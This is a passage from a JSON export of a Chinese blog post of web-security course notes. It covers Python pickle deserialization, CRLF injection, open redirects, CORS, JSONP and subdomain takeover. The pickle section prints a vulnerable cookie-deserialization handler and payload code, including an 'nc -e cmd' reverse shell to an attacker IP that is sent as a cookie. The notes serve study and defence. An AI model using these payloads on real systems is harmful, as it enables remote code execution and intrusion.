class=\"wp-block-list\">\n<li>pickle.dump(obj,file)\uff1a\u5c06\u5bf9\u8c61\u5e8f\u5217\u5316\u540e\u4fdd\u5b58\u5230\u6587\u4ef6<\/li>\n\n\n\n<li>pickle.load(file)\uff1a\u8bfb\u53d6\u6587\u4ef6\uff0c\u5c06\u6587\u4ef6\u4e2d\u7684\u5e8f\u5217\u5316\u5185\u5bb9\u53cd\u5e8f\u5217\u5316\u4e3a\u5bf9\u8c61<\/li>\n\n\n\n<li>pickle.dumps(obj)\uff1a\u5c06\u5bf9\u8c61\u5e8f\u5217\u5316\u4e3a\u5b57\u7b26\u4e32\u683c\u5f0f\u7684\u5b57\u8282\u6d41<\/li>\n\n\n\n<li>pickle.loads(bytes_obj)\uff1a\u5c06\u5b57\u7b26\u4e32\u683c\u5f0f\u7684\u5b57\u8282\u6d41\u53cd\u5e8f\u5217\u5316\u4e3a\u5bf9\u8c61<\/li>\n<\/ul>\n\n\n\n<p>\u9b54\u672f\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>__reduce__()\uff1a\u53cd\u5e8f\u5217\u5316\u65f6\u8c03\u7528<\/li>\n\n\n\n<li>__reduce_ex__()\uff1a\u53cd\u5e8f\u5217\u5316\u65f6\u8c03\u7528<\/li>\n\n\n\n<li>__setstate__()\uff1a\u53cd\u5e8f\u5217\u5316\u65f6\u8c03\u7528<\/li>\n\n\n\n<li>__getstate__()\uff1a\u5e8f\u5217\u5316\u65f6\u8c03\u7528<\/li>\n<\/ul>\n\n\n\n<p>\u5178\u578b\u6f0f\u6d1e\u4ee3\u7801\u6f14\u793a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@app.route(\"\/\")\ndef index():\n    try:\n        user = base64.b64decode(request.cookies.get('user'))\n        user = pickle.loads(user)\n        username = user&#91;\"username\"]\n    except:\n        username = \"Guest\"<\/code><\/pre>\n\n\n\n<p>Python\u7684\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u5371\u5bb3\u66f4\u5927\uff0c\u56e0\u4e3a\u82e5\u4e0d\u5bf9pickle.loads\u51fd\u6570\u5185\u4f20\u5165\u7684\u503c\u505a\u8fc7\u6ee4\uff0c\u5c06\u53ef\u4ee5\u76f4\u63a5\u6784\u9020\u51fd\u6570\u5229\u7528\u6765\u5b9e\u73b0\u653b\u51fb\u3002\u4f8b\u5982\u5229\u7528\u4e00\u6bb5\u4ee3\u7801\u6765\u6784\u9020\u8981\u4f7f\u7528\u7684\u5e8f\u5217\u5316Payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>class A(object):\n    def __reduce__(self):\n        return (os.system,('calc.exe'))\na = A()\naa = pickle.dumps(a)\np_a = base64.b64encode(aa).decode()\nprint(p_a)<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u7684p_a\u5c31\u662f\u8981\u4f5c\u4e3acookie\u4e2duser\u503c\u4f20\u5165\u5230\u76ee\u6807\u7684\u5e8f\u5217\u5316Payload\u3002\u5c06calc.exe\u6362\u6210\u5176\u4ed6\u8bed\u53e5\u4f8b\u5982\u53cd\u5f39shell\u5373\u53ef\u9020\u6210\u66f4\u5927\u5371\u5bb3\u3002\uff08\u4e5f\u53ef\u4ee5\u76f4\u63a5\u6784\u9020\u8bf7\u6c42\u5305\u53d1\u9001Payload\uff09:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>class A(object):\n    def __reduce__(self):\n        return (os.system,('c:\/nc -e cmd &#91;\u653b\u51fb\u673aip] &#91;\u653b\u51fb\u673a\u76d1\u542c\u7aef\u53e3]',))\na = A()\naa = pickle.dumps(a)\np_a = base64.b64encode(aa).decode()\nprint(p_a)\n\nh = {\n    'cookie':'user=' + p_a\n}\nrequest.get('&#91;\u76ee\u6807url]',headers=h)<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u4f7f\u7528Python\u6e90\u7801\u81ea\u52a8\u5316\u5ba1\u8ba1\u5de5\u5177bandit\u8fdb\u884c\u4ee3\u7801\u5ba1\u8ba1\u627e\u5230\u53ef\u80fd\u5b58\u5728\u7684\u5b89\u5168\u95ee\u9898\uff0c\u53c2\u8003\u5b98\u65b9<a href=\"https:\/\/bandit.readthedocs.io\/en\/latest\/\">Welcome to Bandit \u2014 Bandit documentation<\/a>\uff0c\u5b89\u88c5\u547d\u4ee4\uff1apip install bandit\uff0c\u4f7f\u7528\u65b9\u5f0f\uff1abandit -r [\u9700\u5ba1\u8ba1\u7684\u6e90\u7801\u76ee\u5f55]\u3002Linux\u4e0b\u8f7d\u5728Python\u4e0b\u7684bin\uff0cWindows\u4e0b\u8f7d\u5728\u5f53\u524dPython\u4e0b\u7684script\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u516b\u5929\uff1aWEB\u653b\u9632-\u8865\u5145<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">CRLF\u6ce8\u5165\u6f0f\u6d1e<\/h3>\n\n\n\n<p>\u6210\u56e0\uff1aWEB\u5e94\u7528\u6ca1\u6709\u5bf9\u7528\u6237\u8f93\u5165\u505a\u4e25\u683c\u9a8c\u8bc1\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u8f93\u5165\u4e00\u4e9b\u6076\u610f\u5b57\u7b26\u3002\u653b\u51fb\u8005\u5728\u8bf7\u6c42\u884c\u6216\u9996\u90e8\u4e2d\u7684\u5b57\u6bb5\u6ce8\u5165\u6076\u610f\u7684CRLF\uff08\u6362\u884c\u7b26\uff09\u540e\u5c31\u80fd\u6ce8\u5165\u4e00\u4e9b\u9996\u90e8\u5b57\u6bb5\u6216\u62a5\u6587\u4e3b\u4f53\uff0c\u5e76\u5728\u54cd\u5e94\u5305\u4e2d\u8f93\u51fa\u3002\u4e5f\u79f0\u4e3aHTTP\u54cd\u5e94\u62c6\u5206\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<p>\u68c0\u6d4b\u65b9\u5f0f\uff1aCRLF\uff08\u6362\u884c\u7b26\uff09Fuzz<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">URL\u91cd\u5b9a\u5411\u8df3\u8f6c<\/h3>\n\n\n\n<p>\u6210\u56e0\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5f00\u53d1\u65f6\u4e0d\u8003\u8651\u4efb\u610fURL\u8df3\u8f6c\u7684\u5371\u5bb3\u6027<\/li>\n\n\n\n<li>\u5f00\u53d1\u65f6\u53ea\u7528\u53d6\u5b50\u4e32\u3001\u540e\u7f00\u7b49\u65b9\u6cd5\u7b80\u5355\u5224\u65ad\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u9632\u62a4\u53ef\u88ab\u7ed5\u8fc7<\/li>\n\n\n\n<li>\u5bf9\u4f20\u5165\u53c2\u6570\u505a\u4e00\u4e9b\u64cd\u4f5c\uff08\u57df\u540d\u526a\u5207\u3001\u62fc\u63a5\u3001\u91cd\u7ec4\uff09\u548c\u5224\u65ad\uff0c\u5bfc\u81f4\u53ef\u88ab\u7ed5\u8fc7<\/li>\n\n\n\n<li>\u539f\u59cb\u8bed\u8a00\u81ea\u5e26\u7684\u89e3\u6790URL\u3001\u7528\u4e8e\u5224\u65ad\u57df\u540d\u7684\u51fd\u6570\u5e93\u51fa\u73b0\u903b\u8f91\u6f0f\u6d1e\u6216\u7279\u6027\u5bfc\u81f4\u53ef\u88ab\u7ed5\u8fc7<\/li>\n\n\n\n<li>\u539f\u59cb\u8bed\u8a00\u3001\u670d\u52a1\u5668\/\u5bb9\u5668\u7279\u6027\u3001\u6d4f\u89c8\u5668\u7b49\u5bf9\u6807\u51c6URL\u534f\u8bae\u89e3\u6790\u5904\u7406\u7b49\u5dee\u5f02\u6027\u5bfc\u81f4\u53ef\u88ab\u7ed5\u8fc7<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u62d2\u7edd\u670d\u52a1\uff08\u975eDOS\uff09<\/h3>\n\n\n\n<p>\u73b0\u5728\u6709\u8bb8\u591a\u8d44\u6e90\u662f\u7531\u670d\u52a1\u5668\u751f\u6210\u540e\u8fd4\u56de\u7ed9\u5ba2\u6237\u7aef\uff0c\u800c\u6b64\u7c7b\u201c\u8d44\u6e90\u751f\u6210\u201d\u63a5\u53e3\u5982\u82e5\u6709\u53ef\u63a7\u53c2\u6570\u4e14\u6ca1\u505a\u8d44\u6e90\u751f\u6210\u5927\u5c0f\u9650\u5236\uff0c\u5c31\u4f1a\u9020\u6210\u62d2\u7edd\u670d\u52a1\u98ce\u9669\uff0c\u5bfc\u81f4\u670d\u52a1\u5668\u5904\u7406\u4e0d\u8fc7\u6765\u6216\u5360\u7528\u8d44\u6e90\u53bb\u5904\u7406\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8de8\u57dfCORS\u8d44\u6e90<\/h3>\n\n\n\n<p>\u5229\u7528\u8de8\u57df\u7684\u76ee\u7684\u5728\u4e8e\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565\u5b9e\u73b0\u4ea4\u4e92\u3002<\/p>\n\n\n\n<p>CORS\uff08Cross-Origin Resource Sharing\uff09\u8de8\u57df\u8d44\u6e90\u5171\u4eab\uff0c\u662fHtml5\u7684\u4e00\u4e2a\u7279\u6027\uff0c\u88ab\u6240\u6709\u6d4f\u89c8\u5668\u652f\u6301\uff0c\u662f\u4e00\u79cd\u653e\u5bbd\u540c\u6e90\u7b56\u7565\u7684\u673a\u5236\uff0c\u5141\u8bb8\u6d4f\u89c8\u5668\u5411\u8de8\u6e90\u670d\u52a1\u5668\u53d1\u51faXMLHttpRequest\u8bf7\u6c42\uff0c\u4ece\u800c\u514b\u670dAJAX\u53ea\u80fd\u540c\u6e90\u4f7f\u7528\u7684\u9650\u5236\uff0c\u4ee5\u4f7f\u4e0d\u540c\u7684\u7f51\u7ad9\u53ef\u4ee5\u8de8\u57df\u83b7\u53d6\u6570\u636e\u3002<\/p>\n\n\n\n<p>Access-Control-Allow-Origin\uff1a\u6307\u5b9a\u54ea\u4e9b\u57df\u53ef\u4ee5\u8bbf\u95ee\u57df\u8d44\u6e90\u3002<\/p>\n\n\n\n<p>Access-Control-Allow-Credentials\uff1a\u6307\u5b9a\u6d4f\u89c8\u5668\u662f\u5426\u5c06\u4f7f\u7528\u8bf7\u6c42\u53d1\u9001cookie\u3002\u4ec5\u5f53\u8bbe\u7f6e\u4e3atrue\u65f6\u624d\u4f1a\u53d1\u9001cookie\u3002<\/p>\n\n\n\n<p>Access-Control-Allow-Methods\uff1a\u6307\u5b9a\u53ef\u4ee5\u4f7f\u7528\u54ea\u4e9bHttp\u8bf7\u6c42\u65b9\u6cd5\u6765\u8bbf\u95ee\u8d44\u6e90\u3002\u6b64\u6807\u5934\u5141\u8bb8\u5f00\u53d1\u8005\u6307\u5b9a\u7f51\u7ad9\u5bf9\u5916\u8bbf\u95ee\u65f6\u54ea\u4e9b\u6709\u6548\u6765\u8fdb\u4e00\u6b65\u63d0\u9ad8\u5b89\u5168\u6027\u3002<\/p>\n\n\n\n<p>\u53ef\u4f7f\u7528\u5de5\u5177\u8fdb\u884c\u68c0\u6d4b\uff1a<a href=\"https:\/\/github.com\/chenjj\/CORScanner\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub &#8211; chenjj\/CORScanner: \ud83c\udfaf Fast CORS misconfiguration vulnerabilities scanner<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">JSONP\u56de\u8c03<\/h3>\n\n\n\n<p>JSON\u8de8\u57df\u5229\u7528\u4e86script\u6807\u7b7e\u80fd\u8de8\u57df\u7684\u7279\u70b9\uff0c\u5b9e\u73b0\u4e86json\u7684\u8de8\u57df\u4f20\u8f93\u3002<\/p>\n\n\n\n<p>\u901a\u8fc7\u67e5\u770b\u6570\u636e\u5305\u54ea\u91cc\u6709\u56de\u8c03\uff0c\u5bf9\u56de\u8c03\u91cc\u7684\u654f\u611f\u4fe1\u606f\u8fdb\u884c\u83b7\u53d6\uff0c\u4ece\u800c\u95f4\u63a5\u83b7\u53d6\u672c\u4f1a\u88ab\u8fc7\u6ee4\u9632\u62a4\u7684\u654f\u611f\u4fe1\u606f\u3002<\/p>\n\n\n\n<p>\u53ef\u624b\u52a8\u5ba1\u67e5\u5143\u7d20\u8fdb\u884c\u7b5b\u9009\u6216\u5229\u7528Burp\u63d2\u4ef6\uff1a<a href=\"https:\/\/github.com\/p1g3\/JSONP-Hunter\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub &#8211; p1g3\/JSONP-Hunter: JSONP Hunter in burpsuite.<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5b50\u57df\u540d\u63a5\u7ba1\u52ab\u6301<\/h3>\n\n\n\n<p>\u57df\u540d\u89e3\u6790\u8bb0\u5f55\u6307\u5411\u57df\u540d\uff0c\u5bf9\u5e94\u7684\u4e3b\u673a\u6307\u5411\u4e86\u4e00\u4e2a\u5f53\u524d\u672a\u5728\u4f7f\u7528\u6216\u5df2\u7ecf\u5220\u9664\uff08\u8fc7\u671f\uff09\u7684\u7279\u5b9a\u670d\u52a1\uff0c\u653b\u51fb\u8005\u901a\u8fc7\u6ce8\u518c\u6307\u5411\u7684\u5df2\u8fc7\u671f\u57df\u540d\uff0c\u4ece\u800c\u63a7\u5236\u5f53\u524d\u57df\u540d\u7684\u63a7\u5236\u6743\uff0c\u5b9e\u73b0\u6076\u610f\u8f6f\u4ef6\u5206\u53d1\u3001\u9493\u9c7c\u3001XSS\u3001\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u7b49\u3002<\/p>\n\n\n\n<p>\u53ef\u5229\u7528\u5de5\u5177\u68c0\u6d4b\uff1a<a href=\"https:\/\/github.com\/pwnesia\/dnstake\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub &#8211; pwnesia\/dnstake: DNSTake \u2014 A fast tool to check missing hosted DNS zones that can lead to subdomain takeover<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u524d\u63d0\uff1a\u5728WEB\u5b89\u5168\u65b9\u9762\u7684\u5b66\u4e60\u611f\u5230\u4e86\u74f6\u9888\u548c\u8ff7\u832b\uff0c\u5bf9WEB\u65b9\u5411\u4ee5\u5916\u7684\u77e5\u8bc6\u5b58\u5728\u6b20\u7f3a\uff0c\u4e8e\u662f\u51b3\u5b9a\u901a\u8fc7\u5c0f\u8fea\u7684\u5168\u6808\u6e17\u900f\u8bfe\u7a0b\u67e5\u6f0f\u8865\u7f3a\u4e00\u4e0b\u3002 \u7b2c\u4e00\u5929\uff1a\u6587\u4ef6\u4e0b\u8f7d&amp;\u53cd\u5f39shell PS.\u67e5\u8be2\u653b\u51fb\u65b9\u5f0f\u540d\u79f0\uff08ATT&amp;CK\uff09\uff1ahttps:\/\/attack.mitre.org \u5de5\u5177\u7f51\u7ad9\uff1a\uff08\u68f1\u89d2\uff09https:\/\/forum.ywhack.com\/ \u6587\u4ef6\u4e0b\u8f7d \u76ee\u7684\uff1a\u89e3\u51b3\u65e0\u56fe\u5f62\u5316\u754c\u9762&amp;\u6570\u636e\u4f20\u8f93\u3002 \u547d\u4ee4\u90fd\u53ef\u4ee5\u5728\u68f1\u89d2\u4e0a\u67e5\u8be2 Linux\uff1awget curl python ruby perl java\u7b49 Windows\uff1aPowershell Certutil Bitsadmin msiexec mshta rund1132\u7b49 \u53cd\u5f39shell \u76ee\u7684\uff1a\u89e3\u51b3\u6570\u636e\u56de\u663e&amp;\u6570\u636e\u901a\u8baf\u3002 \u5e94\u7528\u60c5\u666f\uff1a\u5916\u90e8\u65e0\u6cd5\u7ed5\u8fc7\u9632\u706b\u5899\u8bbf\u95ee\u5185\u7f51\u3002 \u5177\u4f53\u547d\u4ee4\u53ef\u4ee5\u7528\u68f1\u89d2\u8bbe\u7f6e\u3002 \u5185\u7f51 &#8211;&gt; ip\uff08\u5185\u7f51\u53ef\u4ee5\u5411\u5916\u90e8IP\u8fdb\u884c\u8bbf\u95ee\uff09 ip !&#8211;&gt; \u5185\u7f51\uff08\u9632\u706b\u5899\u539f\u56e0\u4f7f00\u5916\u90e8IP\u4e0d\u80fd\u8bbf\u95ee\u5185\u7f51\uff09 \u53cd\u5f39shell\uff1a\u5f53\u62ff\u5230\u4e00\u4e2a\u5185\u7f51\u673a\u5b50\u7684RCE\uff08\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\uff09\u65f6\uff0c\u53ef\u4ee5\u901a\u8fc7RCE\u5199\u4e00\u4e2a\u53cd\u5f39\u547d\u4ee4\uff0c\u5f39\u4e00\u4e2ashell\u7ed9\u653b\u51fb\u673a\uff0c\u4ece\u800c\u5b9e\u73b0\u4efb\u610f\u547d\u4ee4\u6267\u884c\u4ee5\u53ca\u56de\u663e\u3002 \u7b2c\u4e8c\u5929\uff1aWEB\u5e94\u7528\u67b6\u6784&amp;\u6f0f\u6d1e&amp;HTTP WEB\u5e94\u7528\u67b6\u6784 WEB\u5e94\u7528\u7ec4\u6210\u89d2\u8272\u529f\u80fd\u67b6\u6784\uff1a\u5f00\u53d1\u8bed\u8a00\u3001\u7a0b\u5e8f\u6e90\u7801\u3001\u4e2d\u95f4\u4ef6\u5bb9\u5668\u3001\u6570\u636e\u5e93\u7c7b\u578b\u3001\u670d\u52a1\u5668\u64cd\u4f5c\u7cfb\u7edf\u3001\u7b2c\u4e09\u65b9\u8f6f\u4ef6\u3002 \u5f00\u53d1\u8bed\u8a00\uff1aasp\uff0cphp\uff0caspx\uff0cjsp\uff0cjava\uff0cpython\uff0cruby\uff0cgo\uff0chtml\uff0cjavascript\u7b49\u3002 \u7a0b\u5e8f\u6e90\u7801\uff1a\u5f00\u53d1\u8bed\u8a00\u5206\u7c7b\u3001\u5e94\u7528\u7c7b\u578b\u5206\u7c7b\u3001\u5f00\u6e90cms\u5206\u7c7b\u3001\u5f00\u53d1\u6846\u67b6\u5206\u7c7b\u3002 \u4e2d\u95f4\u4ef6\u5bb9\u5668\uff1aIIS\uff0cApache\uff0cNginx\uff0cTomcat\uff0cWeblogic\uff0cJboos\uff0cglasshfish\u7b49\u3002 \u6570\u636e\u5e93\u7c7b\u578b\uff1aAccess\uff0cMysql\uff0cMssql\uff0cOracle\uff0cdb2\uff0cSybase\uff0cRedis\uff0cMongoDB\u7b49\u3002 \u670d\u52a1\u5668\u64cd\u4f5c\u7cfb\u7edf\uff1aWindows\u7cfb\u5217\uff0cLinux\u7cfb\u5217\uff0cMac\u7cfb\u5217\u7b49\u3002 \u7b2c\u4e09\u65b9\u8f6f\u4ef6\uff1aphpmyadmin\uff0cvs-ftpd\uff0cVNC\uff0cELK\uff0cOpenssh\u7b49\u3002 \u5e38\u89c1WEB\u5e94\u7528\u5b89\u5168\u6f0f\u6d1e\u5206\u7c7b SQL\u6ce8\u5165\uff0c\u6587\u4ef6\u5b89\u5168\uff0cRCE\u6267\u884c\uff0cXSS\u8de8\u7ad9\uff0cCSRF\/SSRF\/CRLF\uff0c\u53cd\u5e8f\u5217\u5316\uff0c\u903b\u8f91\u8d8a\u6743\uff0c\u672a\u6388\u6743\u8bbf\u95ee\uff0cXXE\/XML\uff0c\u5f31\u53e3\u4ee4\u7b49\u3002 HTTP\u6570\u636e\u5305 PS.\u5b66\u4e60HTTP\u6570\u636e\u5305\u65f6\u5efa\u8bae\u914d\u5408Burpsuit\u6293\u5305\u6765\u7406\u89e3\u3002 \u8bf7\u6c42\u6570\u636e\u5305\uff08Request\uff09\uff1a\u8bf7\u6c42\u884c\u3010\u65b9\u6cd5\u5b57\u6bb5\uff08GET\uff0cPOST\uff0cHEAD\uff0cPUT\uff0cDELETE\uff09\uff0cURL\u5b57\u6bb5\uff0cHTTP\u7248\u672c\u5b57\u6bb5\u3011\uff0c\u9996\u90e8\u884c\uff0c\u5b9e\u4f53\u4f53\u3002 \u54cd\u5e94\u5305\uff08Response\uff09\uff1a\u72b6\u6001\u884c\uff08\u72b6\u6001\u7801\uff09\uff0c\u9996\u90e8\u884c\uff0c\u5b9e\u4f53\u4f53\u3002 \u7b2c\u4e09\u5929\uff1a\u6293\u5305&amp;\u5c01\u5305 PS.\u4e0d\u540c\u5bf9\u8c61\u91c7\u7528\u4e0d\u540c\u6293\u5305\u5c01\u5305\u6280\u672f\u3002 \u6293\u5305\u7684\u76ee\u7684\uff1a\u5c06\u770b\u4e0d\u89c1\u7684\u4e1c\u897f\u8f6c\u6210\u80fd\u770b\u89c1\u7684\u4e1c\u897f\u3002 \u76f8\u5173\u5de5\u5177\u6293\u53d6HTTPS\u6570\u636e\u5305\u9700\u8981\u5b89\u88c5\u8bc1\u4e66\uff0c\u94fe\u63a5\u5982\u4e0b\uff1a Charles\uff1ahttps:\/\/blog.csdn.net\/weixin_45459427\/article\/details\/108393878 Fiddler\uff1ahttps:\/\/blog.csdn.net\/weixin_45043349\/article\/details\/120088449 Burpsuite\uff1ahttps:\/\/blog.csdn.net\/qq_36658099\/article\/details\/81487491 \u57fa\u4e8e\u7f51\u7edc\u63a5\u53e3\u6293\u5305 WireShark &amp; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":268,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-260","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-study"],"_links":{"self":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts\/260"}],"collection":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=260"}],"version-history":[{"count":87,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions"}],"predecessor-version":[{"id":573,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions\/573"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/media\/268"}],"wp:attachment":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=260"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}